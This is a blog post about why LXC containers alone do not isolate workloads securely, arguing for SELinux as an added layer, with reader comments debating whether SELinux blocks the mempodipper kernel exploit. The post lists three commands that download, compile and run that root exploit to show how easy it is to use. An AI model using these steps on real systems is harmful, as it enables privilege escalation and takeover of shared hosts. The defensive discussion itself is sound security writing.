Are LXC containers enough?

First off, let me state that I think the LXC project is great.  In previous blog posts, I’ve talked about segmenting existing virtual machines to securely run multiple workloads and achieve better flexibility, cost, etc.  This concept is often referred to as ‘Linux Containers’, and creating these containers with the LXC project is a very popular approach.  LXC aggregates a collection of other technologies such as Linux Control Groups, Kernel Namespaces, Bind Mounts and others to accomplish this in an easy way.  Good stuff.  The question, however, is whether LXC alone is enough to give you confidence in your approach to utilizing Linux containers.

In the words of Dan Berrange:

Repeat after me “LXC is not yet secure. [. . .]”

In other words, no, it’s not enough.  The main problem right now is that LXC doesn’t have any inherent protection against exploits that allow a user to become root.  In the world of Linux, traditionally if you have root you can do anything.  When using containers, that means that if one container can find a way to become root on the machine, it can do whatever it wants with all the other containers on the box.  I think the official term for that situation in IT is a ‘cluster’.  While kernel capabilities are meant to segment the abilities that root actually has, they are a long way from being a realistic defense, especially on the production systems in deployment today.

How realistic are these exploits, though?  To many, the concept of a kernel or security exploit is something they would rather believe just doesn’t actually happen.  Maybe they prefer to think that it’s limited to the realm of academic discussions.  Or maybe they just believe it’s not going to happen to them.

Unfortunately, the reality is quite different.  While I agree that finding an exploit requires an amazing amount of knowledge and creativity, using an exploit for malicious purposes isn’t that challenging.  For example, let’s look at the excellent article written by Jason A. Donenfeld about a kernel exploit that is able to achieve root access.  Jason explains how this exploit works in amazing detail here: http://blog.zx2c4.com/749.  Believe me, discovering that and writing that article was a LOT of work.  But now, let’s look at how easy it is to use that exploit on unpatched kernels:

  • Download the provided C program (e.g. wget http://bit.ly/wELTpn)
  • Compile it (gcc mempodipper.c -o mempodipper)
  • Run it and get root access (./mempodipper)

Pretty scary, huh?  Three steps and I could get root on your machine.  I can hear the sighs of relief already though, as people start thinking:

I don’t have to worry about this since I don’t let people run arbitrary code on my machines…

Let’s discuss that train of thought for a minute.  First, let’s approach this from the perspective of a Platform as a Service (PaaS).  A PaaS essentially allows users to run their own code on machines shared by many.  That means experimenting with an exploit like this in a PaaS environment isn’t very difficult at all.  And remember, if any user can get root on that system, they own all the applications on it.

Not consuming or hosting a PaaS?  Well, I’ve spent many years in IT shops and the traditional IT deployments for large companies don’t look all that different.  Granted, the code is usually coming from employees and contractors, but you still probably don’t want to risk root exposure from anyone who is able to deploy a change into your environment.

Well, if LXC doesn’t protect against this and my traditional environments are susceptible as well, is there any hope at all?  Thankfully, there is.

The solution is using SELinux in combination with whatever container technologies you are using.  With an SELinux policy, you are essentially able to control the operations of any running process, regardless of which user it runs as.  SELinux provides a layer of protection against root itself, which is where most other security mechanisms fail.  When a user is running in an SELinux context on a system and tries an exploit like the one above, you have an extra line of defense.  It’s easy for you to establish a confined environment that limits riskier operations like setuid syscalls and restricts memory access which, in turn, would stop this exploit and others.  Most importantly, you can get consistent protection across any process, no matter which user it is running as.
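One practical caveat: none of this helps unless SELinux is actually enforcing.  As a minimal sketch (Python is my choice for illustration here), the snippet below reads the enforce flag that selinuxfs exposes.  The helper name selinux_mode is hypothetical, and the path /sys/fs/selinux/enforce is an assumption about where selinuxfs is mounted on your system; older installs may mount it elsewhere.

```python
from pathlib import Path


def selinux_mode(enforce_path="/sys/fs/selinux/enforce"):
    """Return 'enforcing', 'permissive', or 'disabled'.

    Hypothetical helper. The default path assumes selinuxfs is mounted
    at /sys/fs/selinux, which may not hold on every system.
    """
    try:
        flag = Path(enforce_path).read_text().strip()
    except OSError:
        # Assumption: if the flag file cannot be read, selinuxfs is not
        # mounted, so we treat SELinux as disabled.
        return "disabled"
    # The flag file holds "1" when enforcing and "0" when permissive.
    return "enforcing" if flag == "1" else "permissive"


if __name__ == "__main__":
    print(selinux_mode())
```

If this reports anything other than enforcing, the policy is at best logging denials rather than blocking them.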

You can think of SELinux as a whitelisting approach instead of blacklisting.  The traditional model of security (often referred to as Discretionary Access Control or DAC) requires protecting against anything a user should not be able to do.  Given the complexity of systems today, that’s becoming unrealistic for mere mortals.  The SELinux model of security (often referred to as Mandatory Access Control or MAC) requires enabling everything a user should be able to do.

While it’s not a silver bullet, it’s an elegant mitigation in many areas.  Many types of IT hosting are becoming increasingly standardized and you can put in place fairly simple policies that specify what users should be able to do.  For web applications, you are going to allow binding to HTTP / HTTPS ports.  You are probably going to allow JDBC connections.  You can describe the allowed behaviors of many of your applications in a fairly concise way.  Thinking of security this way mitigates many of the exploits that take a creative path like the one above (setuid access, /proc file descriptor access, and memory manipulation).  Unless you have a pretty special web application, it’s safe to say it shouldn’t be doing that stuff :)
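To make the whitelist idea concrete, here is a toy sketch in Python.  It is not SELinux policy syntax and it is not how SELinux is implemented; the Action type, the two sets, and the function names are all hypothetical, invented only to contrast the two ways of thinking.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Action:
    """A hypothetical description of something a process tries to do."""
    kind: str    # e.g. "bind_port", "connect", "syscall", "open"
    target: str  # e.g. "443", "jdbc", "setuid", "/proc/self/mem"


# Whitelist: everything a typical web application should be able to do.
WEB_APP_ALLOWED = frozenset({
    Action("bind_port", "80"),
    Action("bind_port", "443"),
    Action("connect", "jdbc"),
})

# Blacklist: only the bad behavior somebody thought of ahead of time.
KNOWN_BAD = frozenset({
    Action("syscall", "setuid"),
})


def allowlist_permits(action, allowed=WEB_APP_ALLOWED):
    # Permit only what was explicitly enabled.
    return action in allowed


def denylist_permits(action, denied=KNOWN_BAD):
    # Permit anything that was not explicitly forbidden.
    return action not in denied


if __name__ == "__main__":
    attempts = [
        Action("bind_port", "443"),
        Action("syscall", "setuid"),
        Action("open", "/proc/self/mem"),
    ]
    for a in attempts:
        print(f"{a.kind}:{a.target}",
              f"allowlist={allowlist_permits(a)}",
              f"denylist={denylist_permits(a)}")
```

The interesting case is the last one: nobody thought to forbid opening /proc/self/mem, so the blacklist lets it through, while the whitelist rejects it simply because a web application was never granted it.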

Interested in learning more?  The place I recommend starting is the Fedora documentation.  Fedora and RHEL have some of the best SELinux policies and support in the industry.  The documentation covers everything from learning SELinux to debugging it.  Most importantly though, don’t get fooled into thinking all Linux distributions are the same.  While SELinux support is in the kernel, what really matters is the ecosystem of policies that exist.  In Fedora or RHEL, you get whitelists ready-made for a slew of well known systems like Apache.  In many other distros, you’d spend your time having to recreate that work for the standard systems and never have any time to focus on your application policies.  That’s probably not the best use of your time, and it would be a daunting first experience with SELinux to say the least.

My last disclaimer is that even as powerful as SELinux is, I wouldn’t recommend putting all your eggs in one basket when it comes to security.  Combine SELinux with other security measures and maintain traditional operational best practices to minimize your exposure (e.g. apply security updates, audit, etc.).  In other words, use it as an enhancement to what you do today, not a replacement.

Well, if you’ve made it this far, I’ll assume you are a convert: Welcome to the world of SELinux and sleeping a little better at night!

14 thoughts on “Are LXC containers enough?”

  1. I like the premise of the article but I don’t like your use of the mempodipper exploit. That exploit is a kernel exploit. SELinux cannot protect against kernel exploits, as it exists at the kernel layer. If you had a user space exploit that gave you root privileges then the example would be on firmer ground. You can restrict paths of attack with SELinux policies, which could prevent an attacker from exploiting a kernel vulnerability, but that is a different situation. We can’t give people the impression that SELinux is going to protect them from kernel vulnerabilities because at best it can just restrict the attacker’s avenues of attack.

    • The reason I brought this up is because SELinux policies don’t protect against the behavior that mempodipper uses.

  2. David, I believe in this case it would prevent the attack, since the attack requires the ability to run a setuid app, which would be blocked by SELinux. Even if you have the ability to execute programs from the qemu process, SELinux would prevent you from executing setuid apps, which would prevent this attack.

  3. I believe the policy for OpenShift instances would prevent this attack since it would block the ability to execute the setuid system call required to attack the machine. Even if you were able to jump over the authorization phase, the application would still be required to execute the setuid system call, which SELinux would block.

    SELinux cannot block all kernel vulnerabilities. If the confined application is allowed to communicate with the device, file or kernel file system that is used to attack the kernel, then SELinux will not block the attack. In general, security in layers is best: a combination of DAC, SELinux, namespacing, memory randomization etc., as well as keeping the machine up to date with security updates.

    Which makes using a system like OpenShift all the more interesting since the administrators of OpenShift are doing all the heavy lifting.

  4. I agree that you can use policy to lock down the attack vector, and in the OpenShift case that may well be true. However, when mempodipper was released we did nothing to stop it. I briefly spoke with Steve about it and it was a combination of how we deal with labeling of proc and policy. It’s just important that we keep the message clear so we don’t have someone come along and dismiss our claims because an example was wrong (which unfortunately I’ve seen happen elsewhere with this exact exploit).

    • That being said though I like the content of the article and it was a really interesting read. I’m going to toss it up on the selinux google+ page as well.

      • Hey Dave, I appreciate the comments. I do agree that people shouldn’t view SELinux as a silver bullet – especially with kernel exploits. That said, I do spend much of my time with the ‘setenforce 0’ crew, so I wanted to try and capture some of the power of SELinux policies, even if those policies are just used to reduce user space exploit attack vectors. Glad you thought it was an interesting read – I’ll try and cover more details as we continue to experiment on OpenShift.

    • I would of course listen to Steve on this, but my quick read of the vulnerability was that you had to run in a domain that was allowed setuid access in order to take advantage of it. Since an OpenShift instance is not allowed to execute setuid and is not able to transition to any domains that can execute setuid, like passwd_t, su_t or sudo_t, this vulnerability would be blocked.
